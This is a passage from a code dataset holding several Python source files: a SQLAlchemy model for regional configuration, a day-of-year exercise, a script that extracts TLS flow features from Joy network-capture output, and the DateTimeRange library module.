_logger.info(response)\n","sub_path":"sticker_management/models/printed_stickers.py","file_name":"printed_stickers.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45097602","text":"\"\"\"\npyape.app.models.regional\n~~~~~~~~~~~~~~~~~~~\n\nRegional 表\n\"\"\"\nimport time\nimport toml\nfrom sqlalchemy.sql.expression import text\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom pyape.app import gdb, logger\nfrom pyape.app.queryfun import commit_and_response_error\nfrom pyape.config import RegionalConfig\nfrom pyape.util.func import parse_int\n\n\nclass Regional(gdb.Model):\n \"\"\" Regional 配置\n \"\"\"\n __tablename__ = 'regional'\n\n # 1000测试 2000审核 5000正式\n REGIONAL_TYPES = [1000, 2000, 5000]\n\n # Regional 配置的主键序号\n r = gdb.Column(gdb.SMALLINT, primary_key=True, index=True, autoincrement=False)\n\n # Regional 名称\n name = gdb.Column(gdb.VARCHAR(100), nullable=False)\n\n # Regional 的具体配置, TOML 字符串\n value = gdb.Column(gdb.TEXT, nullable=True)\n\n # 对 regional 的一种分类法,其值应为 typeid\n kindtype = gdb.Column(gdb.SMALLINT, nullable=False, index=True)\n\n # Regional 的状态,值为在 TypeID 中的整数,1正常,5 禁用\n status = gdb.Column(gdb.SMALLINT, nullable=False, default=1)\n\n # createtime = gdb.Column(gdb.TIMESTAMP(True), server_default=text('CURRENT_TIMESTAMP'))\n # updatetime = gdb.Column(gdb.TIMESTAMP(True), nullable=True,\n # server_default=text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'))\n\n # 改用时间戳,将格式化完全交给客户端来处理\n createtime = gdb.Column(gdb.INT, nullable=False)\n updatetime = gdb.Column(gdb.INT, nullable=True)\n\n @staticmethod\n def r2type(r):\n \"\"\" 将 r 转换成数字表示的 mjptype\n \"\"\"\n if r >= 1000 and r < 2000:\n return 1000\n elif r >= 2000 and r < 3000:\n return 2000\n elif r >= 5000:\n return 5000\n return None\n\n @classmethod\n def get_qry(cls, kindtype=None, rtype=None, status=None):\n \"\"\" 获取排序过的 Regional 项目,可以根据 kindtype/rtype/status 筛选\n :param kindtype:\n :param rtype:\n :param status:\n :return:\n \"\"\"\n cause = []\n if kindtype is not None:\n cause.append(cls.kindtype == kindtype)\n if status is not None:\n cause.append(cls.status == status)\n if rtype is not None:\n if rtype == 1000:\n cause.append(cls.r.between(1000, 1999))\n elif rtype == 2000:\n cause.append(cls.r.between(2000, 2999))\n else:\n cause.append(cls.r.between(5000, 5999))\n return cls.query.filter(*cause).\\\n order_by(cls.status, cls.createtime.desc())\n\n def merge(self):\n \"\"\" 合并数据库中的其他字段到 value 配置中\n \"\"\"\n parsed_dict = {}\n if self.value is not None:\n parsed_dict = toml.loads(self.value)\n parsed_dict['name'] = self.name\n parsed_dict['r'] = self.r\n parsed_dict['kindtype'] = self.kindtype\n parsed_dict['status'] = self.status\n parsed_dict['createtime'] = self.createtime\n parsed_dict['updatetime'] = self.updatetime\n parsed_dict['rtype'] = Regional.r2type(self.r)\n return parsed_dict\n\n\ndef get_regional_config(status=None):\n \"\"\" 从数据库中读取 regional 的配置,转换成 RegionalConfig\n \"\"\"\n # 取出数据库中所有启用的 Regional\n qry = Regional.query\n if isinstance(status, int):\n qry = qry.filter_by(status=status)\n regional_list = [ritem.merge() for ritem in qry.all()]\n return RegionalConfig(regional_list)\n\n\ndef check_regional(r, ignore_zero=False):\n \"\"\" 检查 regional 是否有效,同时返回数据库中查询到的 regional 配置\n :param ignore_zero: 值为真,则允许 r 值为 0。0 是一个特殊的 r 值,代表全局 r\n :return: 已经转换成整数的 regional 值,以及数据库中查到的 regional 配置\n \"\"\"\n r = parse_int(r)\n if r is None:\n return None, None\n if ignore_zero:\n if r == 0:\n return 0, Regional.query.filter_by(status=1, r=0).first()\n # 从数据库中的启用的 regional 中查找\n regional = Regional.query.filter_by(status=1, r=r).first()\n if regional is None:\n return None, None\n return r, regional\n\n\ndef check_regionals(rs, ignore_zero=False):\n \"\"\" 判断数据库中是否包含所有的 rs\n :param ignore_zero: 值为真,则允许 rs 值为 [0]。0 是一个特殊的 r 值,代表全局 r\n \"\"\"\n lenrs = len(rs)\n if ignore_zero:\n # 传递 0 的时候, rs 只能拥有 1 个项: 0\n if lenrs == 1 and parse_int(rs[0]) == 0:\n return True\n regionals = Regional.query.filter_by(status=1).filter(Regional.r.in_(rs)).all()\n return len(regionals) == lenrs\n\n\ndef init_regional():\n \"\"\" 初始化 regional0 这是必须存在的一条\n \"\"\"\n r0 = Regional.query.get(0)\n if r0 is not None:\n raise TypeError('The regional 0 is exists!')\n\n now = int(time.time())\n r0 = Regional(r=0, name='0', kindtype=0, status=1, createtime=now, updatetime=now)\n resp = commit_and_response_error(r0, return_dict=True)\n if resp is not None:\n raise SQLAlchemyError('Init regional table error: %s' % resp['message'])\n","sub_path":"pyape/app/models/regional.py","file_name":"regional.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"530532485","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n输入某年某月某日,判断这一天是这一年的第几天?\n\"\"\"\n\n\nimport datetime\n\ndef judge_day(year, month, day):\n date1 = datetime.date(year=int(year), month=int(month), day=int(day))\n date2 = datetime.date(year=int(year), month=1, day=1) # 做差\n return (date1 - date2).days + 1\n\n\nif __name__ == \"__main__\":\n year = input(\"请输入年份:\")\n month = input(\"请输入月份:\")\n day = input(\"请输入天:\")\n string = '/'.join([year, month, day])\n print(\"%s 是 %s 的第 %d 天。\"%(string, year, judge_day(year, month, day)))","sub_path":"20_01_31 Exercises/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436762668","text":"import ujson as json\nimport sys\nimport gzip\nfrom collections import defaultdict\nimport argparse\nimport os\n#import matplotlib.pyplot as plt\nimport numpy as np\ndef getMetadata(flow): \n\ttmp = []\n\t# inbound packets\n\tif 'num_pkts_in' in flow:\n\t\ttmp.append(flow['num_pkts_in'])\n\telse:\n\t\ttmp.append(0)\n\t# outbound packets\n\tif 'num_pkts_out' in flow:\n\t\ttmp.append(flow['num_pkts_out']) \n\telse:\n\t\ttmp.append(0)\n\t# inbound bytes\n\tif 'bytes_in' in flow:\n\t\ttmp.append(flow['bytes_in']) \n\telse:\n\t\ttmp.append(0)\n\t# outbound bytes\n\tif 'bytes_out' in flow:\n\t\ttmp.append(flow['bytes_out']) \n\telse:\n\t\ttmp.append(0)\n\t# elapsed time of flow\n\tif flow['packets'] == []:\n\t\ttmp.append(0)\n\telse:\n\t\ttime = 0\n\t\tfor packet in flow['packets']:\n\t\t\ttime += packet['ipt']\n\t\ttmp.append(time)\n\treturn tmp\n\ndef getTimes(flow):\n\tnumRows = 10\n\tbinSize = 50.0\n\ttransMat = np.zeros((numRows,numRows))\n\tif len(flow['packets']) == 0:\n\t\treturn list(transMat.flatten())\n\telif len(flow['packets']) == 1:\n\t\tcur = min(int(flow['packets'][0]['ipt']/float(binSize)), numRows-1)\n\t\ttransMat[cur, cur] = 1\n\t\treturn list(transMat.flatten())\n\t# get raw transition counts\n\tfor i in range(1, len(flow['packets'])):\n\t\tprev = min(int(flow['packets'][i-1]['ipt']/float(binSize)), numRows-1)\n\t\tcur = min(int(flow['packets'][i]['ipt']/float(binSize)), numRows-1)\n\t\ttransMat[prev, cur] += 1\t\n\t# get empirical transition probabilities\n\tfor i in range(numRows):\n\t\tif float(np.sum(transMat[i:i+1])) != 0:\n\t\t\ttransMat[i:i+1] = transMat[i:i+1]/float(np.sum(transMat[i:i+1]))\n\treturn list(transMat.flatten())\n\ndef getLengths(flow):\n\tnumRows = 10\n\tbinSize = 150.0\n\ttransMat = np.zeros((numRows,numRows))\n\tif len(flow['packets']) == 0:\n\t\treturn list(transMat.flatten())\n\telif len(flow['packets']) == 1:\n\t\tcur = min(int(flow['packets'][0]['b']/float(binSize)), numRows-1)\n\t\ttransMat[cur, cur] = 1\n\t\treturn list(transMat.flatten())\n\t# get raw transition counts\n\tfor i in range(1, len(flow['packets'])):\n\t\tprev = min(int(flow['packets'][i-1]['b']/float(binSize)), numRows-1)\n\t\t#if 'b' not in flow['packets'][i]:\n\t\t#\tbreak\n\t\tcur = min(int(flow['packets'][i]['b']/float(binSize)), numRows-1)\n\t\ttransMat[prev, cur] += 1\n\t# get empirical transition probabilities\n\tfor i in range(numRows):\n\t\tif float(np.sum(transMat[i:i+1])) != 0:\n\t\t\ttransMat[i:i+1] = transMat[i:i+1]/float(np.sum(transMat[i:i+1]))\n\treturn list(transMat.flatten())\n\ndef getByteDist(flow):\n\tif len(flow['packets']) == 0:\n\t\treturn list(np.zeros(256))\n\tif 'byte_dist' in flow and sum(flow['byte_dist']) > 0:\n\t\ttmp = map(lambda x: x/float(sum(flow['byte_dist'])), flow['byte_dist'])\n\t\treturn list(tmp)\n\telse:\n\t\treturn list(np.zeros(256))\n\n\ndef ProcessMETA(inPathName, fileName, meta):\n\tjson_file = \"%s%s\" % (inPathName, fileName)\n\t#print(\"processing META for %s\" %(json_file)) #verbose\n\t#read each line and convert it into dict\n\tlineno = 0\n\ttotal = 0\n\twith gzip.open(json_file, 'r') as fp:\n\t\tfor line in fp:\n\t\t\tlineno = lineno + 1\n\t\t\ttry:\n\t\t\t\ttmp = json.loads(line)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\tif ('version' in tmp) or (\"tls\" not in tmp) or (int(tmp[\"dp\"]) != 443):\n\t\t\t\tcontinue\n\t\t\ttotal += 1\n\t\t\tserverAddr = \"%s@%s@%s@%s\" % (str(lineno), tmp[\"sa\"], str(tmp[\"sp\"]), tmp[\"da\"])\n\t\t\t#print serverAddr\n\t\t\ttry:\n\t\t\t\tmeta[serverAddr]['count'] += 1\n\t\t\t#if serverAddr not in meta:\n\t\t\texcept KeyError:\t\t\t\t\n\t\t\t\tmeta[serverAddr] = defaultdict()\n\t\t\t\tmeta[serverAddr]['count'] = 1\n\t\t\t\t# Multithread to speed up Meta time?\n\t\t\t\t#1 times\n\t\t\t\tmeta[serverAddr]['flowTimes'] = getTimes(tmp)\n\t\t\t\t#2 lengths\n\t\t\t\tmeta[serverAddr]['flowLengths'] = getLengths(tmp)\n\t\t\t\t#3 byte distribution\n\t\t\t\tmeta[serverAddr]['flowByteDist'] = getByteDist(tmp)\n\t\t\t\t\n\ttry:\n\t\tmeta[\"totalMETA\"] += total\t\n\t#if \"totalMETA\" not in meta:\n\texcept KeyError:\t\t\n\t\tmeta[\"totalMETA\"] = total\n\t\t\n\n\ndef saveToJson(outPathName, fileName, meta):\n\tfname = \"%s%s_META.json\" % (outPathName, (fileName.split('.'))[0])\n\t#print(\"save JSON to \" + fname) #verbose\n\twith open(fname, 'w') as fp:\n\t\tjson.dump(meta, fp)\n\ndef main():\n\tparser = argparse.ArgumentParser(description=\"Probability Distribution of META Features in Dataset\", add_help=True)\n\tparser.add_argument('-i', '--input', action=\"store\", help=\"The input folder containing files generated by Joy\")\n\tparser.add_argument('-j', '--json', action=\"store_true\", default=False, help=\"Generate JSON output file\")\n\targs = parser.parse_args()\n\n\t#setup input folder and output folders\n\tif args.input == None or not os.path.isdir(args.input):\n\t\tprint(\"No valid input folder!\")\n\t\treturn\n\telse:\n\t\tjoyFolder = args.input\n\t\tif not joyFolder.endswith('/'):\n\t\t\tjoyFolder += '/'\n\tparentFolder = os.path.abspath(os.path.join(joyFolder, os.pardir))\n\tif not parentFolder.endswith('/'):\n\t\tparentFolder += '/'\n\tMETA_JSON_Folder = \"%sMETA_JSON/\" % (parentFolder)\n\tif not os.path.exists(META_JSON_Folder):\n\t\tos.mkdir(META_JSON_Folder)\n\n\tif args.json == True:\n\t\tfiles = os.listdir(joyFolder)\n\t\tfor item in files:\n\t\t\ttry:\n\t\t\t\tmeta = defaultdict()\n\t\t\t\tProcessMETA(joyFolder, item, meta) \n\t\t\t\tsaveToJson(META_JSON_Folder, item, meta)\n\t\t\texcept:\n\t\t\t\tcontinue\n\telse:\n\t\tprint(\"Nothing to do!\")\n\t\treturn\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"daalAnalyzeMETA.py","file_name":"daalAnalyzeMETA.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"449994282","text":"# encoding: utf-8\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi \n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nfrom .__version__ import __author__, __copyright__, __email__, __license__, __version__\nimport datetime\n\nimport dateutil.parser\nimport dateutil.relativedelta as rdelta\nimport typepy\n\n\nclass DateTimeRange(object):\n \"\"\"\n The class that represents the time range.\n\n :param datetime.datetime/str start: |param_start_datetime|\n :param datetime.datetime/str end: |param_end_datetime|\n\n :Examples:\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900\n\n .. py:attribute:: start_time_format\n\n Conversion format string for :py:attr:`.start_datetime`.\n\n .. seealso:: :py:meth:`.get_start_time_str`\n\n .. py:attribute:: end_time_format\n\n Conversion format string for :py:attr:`.end_datetime`.\n\n .. seealso:: :py:meth:`.get_end_time_str`\n \"\"\"\n\n NOT_A_TIME_STR = \"NaT\"\n\n def __init__(\n self,\n start_datetime=None,\n end_datetime=None,\n start_time_format=\"%Y-%m-%dT%H:%M:%S%z\",\n end_time_format=\"%Y-%m-%dT%H:%M:%S%z\",\n ):\n\n self.set_time_range(start_datetime, end_datetime)\n\n self.start_time_format = start_time_format\n self.end_time_format = end_time_format\n\n self.is_output_elapse = False\n self.separator = \" - \"\n\n def __repr__(self):\n text_list = [self.get_start_time_str(), self.get_end_time_str()]\n\n if self.is_output_elapse:\n suffix = \" ({})\".format(self.end_datetime - self.start_datetime)\n else:\n suffix = \"\"\n\n return self.separator.join(text_list) + suffix\n\n def __eq__(self, other):\n if not isinstance(other, DateTimeRange):\n return False\n\n return all(\n [self.start_datetime == other.start_datetime, self.end_datetime == other.end_datetime]\n )\n\n def __ne__(self, other):\n if not isinstance(other, DateTimeRange):\n return True\n\n return any(\n [self.start_datetime != other.start_datetime, self.end_datetime != other.end_datetime]\n )\n\n def __hash__(self):\n return (self.start_datetime, self.end_datetime).__hash__()\n\n def __add__(self, other):\n return DateTimeRange(self.start_datetime + other, self.end_datetime + other)\n\n def __iadd__(self, other):\n self.set_start_datetime(self.start_datetime + other)\n self.set_end_datetime(self.end_datetime + other)\n\n return self\n\n def __sub__(self, other):\n return DateTimeRange(self.start_datetime - other, self.end_datetime - other)\n\n def __isub__(self, other):\n self.set_start_datetime(self.start_datetime - other)\n self.set_end_datetime(self.end_datetime - other)\n\n return self\n\n def __contains__(self, x):\n \"\"\"\n :param x:\n |datetime|/``DateTimeRange`` instance to compare.\n Parse and convert to |datetime| if the value type is |str|.\n :type x: |datetime|/``DateTimeRange``/|str|\n :return: |True| if the ``x`` is within the time range\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(\"2015-03-22T10:05:00+0900\" in time_range)\n print(\"2015-03-22T10:15:00+0900\" in time_range)\n\n time_range_smaller = DateTimeRange(\"2015-03-22T10:03:00+0900\", \"2015-03-22T10:07:00+0900\")\n print(time_range_smaller in time_range)\n :Output:\n .. parsed-literal::\n\n True\n False\n True\n\n .. seealso::\n :py:meth:`.validate_time_inversion`\n \"\"\"\n\n self.validate_time_inversion()\n\n if isinstance(x, DateTimeRange):\n return x.start_datetime >= self.start_datetime and x.end_datetime <= self.end_datetime\n\n try:\n value = dateutil.parser.parse(x)\n except (TypeError, AttributeError):\n value = x\n\n return self.start_datetime <= value <= self.end_datetime\n\n @property\n def start_datetime(self):\n \"\"\"\n :return: Start time of the time range.\n :rtype: datetime.datetime\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.start_datetime\n :Output:\n .. parsed-literal::\n\n datetime.datetime(2015, 3, 22, 10, 0, tzinfo=tzoffset(None, 32400))\n \"\"\"\n\n return self.__start_datetime\n\n @property\n def end_datetime(self):\n \"\"\"\n :return: End time of the time range.\n :rtype: datetime.datetime\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.end_datetime\n :Output:\n .. parsed-literal::\n\n datetime.datetime(2015, 3, 22, 10, 10, tzinfo=tzoffset(None, 32400))\n \"\"\"\n\n return self.__end_datetime\n\n @property\n def timedelta(self):\n \"\"\"\n :return:\n (|attr_end_datetime| - |attr_start_datetime|) as |timedelta|\n :rtype: datetime.timedelta\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.timedelta\n :Output:\n .. parsed-literal::\n\n datetime.timedelta(0, 600)\n \"\"\"\n\n return self.end_datetime - self.start_datetime\n\n def is_set(self):\n \"\"\"\n :return:\n |True| if both |attr_start_datetime| and\n |attr_end_datetime| were not |None|.\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n\n time_range = DateTimeRange()\n print(time_range.is_set())\n\n time_range.set_time_range(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.is_set())\n :Output:\n .. parsed-literal::\n\n False\n True\n \"\"\"\n\n return all([self.start_datetime is not None, self.end_datetime is not None])\n\n def validate_time_inversion(self):\n \"\"\"\n Check time inversion of the time range.\n\n :raises ValueError:\n If |attr_start_datetime| is\n bigger than |attr_end_datetime|.\n :raises TypeError:\n Any one of |attr_start_datetime| and |attr_end_datetime|,\n or both is inappropriate datetime value.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:10:00+0900\", \"2015-03-22T10:00:00+0900\")\n try:\n time_range.validate_time_inversion()\n except ValueError:\n print \"time inversion\"\n :Output:\n .. parsed-literal::\n\n time inversion\n \"\"\"\n\n if not self.is_set():\n # for python2/3 compatibility\n raise TypeError\n\n if self.start_datetime > self.end_datetime:\n raise ValueError(\n \"time inversion found: {:s} > {:s}\".format(\n str(self.start_datetime), str(self.end_datetime)\n )\n )\n\n def is_valid_timerange(self):\n \"\"\"\n :return:\n |True| if the time range is\n not null and not time inversion.\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range.is_valid_timerange())\n time_range.set_time_range(\"2015-03-22T10:20:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.is_valid_timerange())\n time_range.set_time_range(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.is_valid_timerange())\n :Output:\n .. parsed-literal::\n\n False\n False\n True\n\n .. seealso::\n :py:meth:`.is_set`\n :py:meth:`.validate_time_inversion`\n \"\"\"\n\n try:\n self.validate_time_inversion()\n except (TypeError, ValueError):\n return False\n\n return self.is_set()\n\n def is_intersection(self, x):\n \"\"\"\n :param DateTimeRange x: Value to compare\n :return: |True| if intersect with ``x``\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n x = DateTimeRange(\"2015-03-22T10:05:00+0900\", \"2015-03-22T10:15:00+0900\")\n time_range.is_intersection(x)\n :Output:\n .. parsed-literal::\n\n True\n \"\"\"\n\n return self.intersection(x).is_set()\n\n def get_start_time_str(self):\n \"\"\"\n :return:\n |attr_start_datetime| as |str| formatted with\n |attr_start_time_format|.\n Return |NaT| if the invalid value or the invalid format.\n :rtype: str\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.get_start_time_str())\n time_range.start_time_format = \"%Y/%m/%d %H:%M:%S\"\n print(time_range.get_start_time_str())\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900\n 2015/03/22 10:00:00\n \"\"\"\n\n try:\n return self.start_datetime.strftime(self.start_time_format)\n except AttributeError:\n return self.NOT_A_TIME_STR\n\n def get_end_time_str(self):\n \"\"\"\n :return:\n |attr_end_datetime| as a |str| formatted with\n |attr_end_time_format|.\n Return |NaT| if invalid datetime or format.\n :rtype: str\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.get_end_time_str())\n time_range.end_time_format = \"%Y/%m/%d %H:%M:%S\"\n print(time_range.get_end_time_str())\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:10:00+0900\n 2015/03/22 10:10:00\n \"\"\"\n\n try:\n return self.end_datetime.strftime(self.end_time_format)\n except AttributeError:\n return self.NOT_A_TIME_STR\n\n def get_timedelta_second(self):\n \"\"\"\n :return: (|attr_end_datetime| - |attr_start_datetime|) as seconds\n :rtype: float\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.get_timedelta_second()\n :Output:\n .. parsed-literal::\n\n 600.0\n \"\"\"\n\n return self.__get_timedelta_sec(self.timedelta)\n\n def set_start_datetime(self, value, timezone=None):\n \"\"\"\n Set the start time of the time range.\n\n :param value: |param_start_datetime|\n :type value: |datetime|/|str|\n :raises ValueError: If the value is invalid as a |datetime| value.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range)\n time_range.set_start_datetime(\"2015-03-22T10:00:00+0900\")\n print(time_range)\n :Output:\n .. parsed-literal::\n\n NaT - NaT\n 2015-03-22T10:00:00+0900 - NaT\n \"\"\"\n\n if value is None:\n self.__start_datetime = None\n return\n\n try:\n self.__start_datetime = typepy.type.DateTime(\n value, strict_level=typepy.StrictLevel.MIN, timezone=timezone\n ).convert()\n except typepy.TypeConversionError as e:\n raise ValueError(e)\n\n def set_end_datetime(self, value, timezone=None):\n \"\"\"\n Set the end time of the time range.\n\n :param datetime.datetime/str value: |param_end_datetime|\n :raises ValueError: If the value is invalid as a |datetime| value.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range)\n time_range.set_end_datetime(\"2015-03-22T10:10:00+0900\")\n print(time_range)\n :Output:\n .. parsed-literal::\n\n NaT - NaT\n NaT - 2015-03-22T10:10:00+0900\n \"\"\"\n\n if value is None:\n self.__end_datetime = None\n return\n\n try:\n self.__end_datetime = typepy.type.DateTime(\n value, strict_level=typepy.StrictLevel.MIN, timezone=timezone\n ).convert()\n except typepy.TypeConversionError as e:\n raise ValueError(e)\n\n def set_time_range(self, start, end):\n \"\"\"\n :param datetime.datetime/str start: |param_start_datetime|\n :param datetime.datetime/str end: |param_end_datetime|\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range)\n time_range.set_time_range(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range)\n :Output:\n .. parsed-literal::\n\n NaT - NaT\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900\n \"\"\"\n\n self.set_start_datetime(start)\n self.set_end_datetime(end)\n\n @staticmethod\n def __compare_relativedelta(lhs, rhs):\n if lhs.years < rhs.years:\n return -1\n if lhs.years > rhs.years:\n return 1\n\n if lhs.months < rhs.months:\n return -1\n if lhs.months > rhs.months:\n return 1\n\n if lhs.days < rhs.days:\n return -1\n if lhs.days > rhs.days:\n return 1\n\n if lhs.hours < rhs.hours:\n return -1\n if lhs.hours > rhs.hours:\n return 1\n\n if lhs.minutes < rhs.minutes:\n return -1\n if lhs.minutes > rhs.minutes:\n return 1\n\n if lhs.seconds < rhs.seconds:\n return -1\n if lhs.seconds > rhs.seconds:\n return 1\n\n if lhs.microseconds < rhs.microseconds:\n return -1\n if lhs.microseconds > rhs.microseconds:\n return 1\n\n return 0\n\n def __compare_timedelta(self, lhs, seconds):\n try:\n rhs = datetime.timedelta(seconds=seconds)\n\n if lhs < rhs:\n return -1\n if lhs > rhs:\n return 1\n\n return 0\n except TypeError:\n return self.__compare_relativedelta(\n lhs.normalized(), rdelta.relativedelta(seconds=seconds)\n )\n\n def range(self, step):\n \"\"\"\n Return an iterator object.\n\n :param step: Step of iteration.\n :type step: |timedelta|/dateutil.relativedelta.relativedelta\n :return: iterator\n :rtype: iterator\n\n :Sample Code:\n .. code:: python\n\n import datetime\n from datetimerange import DateTimeRange\n\n time_range = DateTimeRange(\"2015-01-01T00:00:00+0900\", \"2015-01-04T00:00:00+0900\")\n for value in time_range.range(datetime.timedelta(days=1)):\n print(value)\n :Output:\n .. parsed-literal::\n\n 2015-01-01 00:00:00+09:00\n 2015-01-02 00:00:00+09:00\n 2015-01-03 00:00:00+09:00\n 2015-01-04 00:00:00+09:00\n \"\"\"\n\n if self.__compare_timedelta(step, 0) == 0:\n raise ValueError(\"step must be not zero\")\n\n is_inversion = False\n try:\n self.validate_time_inversion()\n except ValueError:\n is_inversion = True\n\n if not is_inversion:\n if self.__compare_timedelta(step, seconds=0) < 0:\n raise ValueError(\"invalid step: expect greater than 0, actual={}\".format(step))\n else:\n if self.__compare_timedelta(step, seconds=0) > 0:\n raise ValueError(\"invalid step: expect less than 0, actual={}\".format(step))\n\n current_datetime = self.start_datetime\n while current_datetime <= self.end_datetime:\n yield current_datetime\n current_datetime = current_datetime + step\n\n def intersection(self, x):\n \"\"\"\n Newly set a time range that overlaps\n the input and the current time range.\n\n :param DateTimeRange x:\n Value to compute intersection with the current time range.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n dtr0 = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n dtr1 = DateTimeRange(\"2015-03-22T10:05:00+0900\", \"2015-03-22T10:15:00+0900\")\n dtr0.intersection(dtr1)\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:05:00+0900 - 2015-03-22T10:10:00+0900\n \"\"\"\n\n self.validate_time_inversion()\n x.validate_time_inversion()\n\n if any([x.start_datetime in self, self.start_datetime in x]):\n start_datetime = max(self.start_datetime, x.start_datetime)\n end_datetime = min(self.end_datetime, x.end_datetime)\n else:\n start_datetime = None\n end_datetime = None\n\n return DateTimeRange(\n start_datetime=start_datetime,\n end_datetime=end_datetime,\n start_time_format=self.start_time_format,\n end_time_format=self.end_time_format,\n )\n\n def encompass(self, x):\n \"\"\"\n Newly set a time range that encompasses\n the input and the current time range.\n\n :param DateTimeRange x:\n Value to compute encompass with the current time range.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n dtr0 = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n dtr1 = DateTimeRange(\"2015-03-22T10:05:00+0900\", \"2015-03-22T10:15:00+0900\")\n dtr0.encompass(dtr1)\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:15:00+0900\n \"\"\"\n\n self.validate_time_inversion()\n x.validate_time_inversion()\n\n return DateTimeRange(\n start_datetime=min(self.start_datetime, x.start_datetime),\n end_datetime=max(self.end_datetime, x.end_datetime),\n start_time_format=self.start_time_format,\n end_time_format=self.end_time_format,\n )\n\n def truncate(self, percentage):\n \"\"\"\n Truncate ``percentage`` / 2 [%] of whole time from first and last time.\n\n :param float percentage: Percentage of truncate.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\n \"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.is_output_elapse = True\n print(time_range)\n time_range.truncate(10)\n print(time_range)\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 (0:10:00)\n 2015-03-22T10:00:30+0900 - 2015-03-22T10:09:30+0900 (0:09:00)\n \"\"\"\n\n self.validate_time_inversion()\n\n if percentage < 0:\n raise ValueError(\"discard_percent must be greater or equal to zero: \" + str(percentage))\n\n if percentage == 0:\n return\n\n discard_time = self.timedelta // int(100) * int(percentage / 2)\n\n self.__start_datetime += discard_time\n self.__end_datetime -= discard_time\n\n def __validate_value(self, data_prop):\n if data_prop.typecode not in [typepy.Typecode.DATETIME, typepy.Typecode.NONE]:\n raise ValueError(\"invalid datetime value: {}\".format(data_prop))\n\n @staticmethod\n def __get_timedelta_sec(dt):\n return int(dt.days * 60 ** 2 * 24 + float(dt.seconds) + dt.microseconds / (1000.0 ** 2))\n","sub_path":"datetimerange/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":21766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537945317","text":"from django.http import HttpRequest, HttpResponse\nfrom 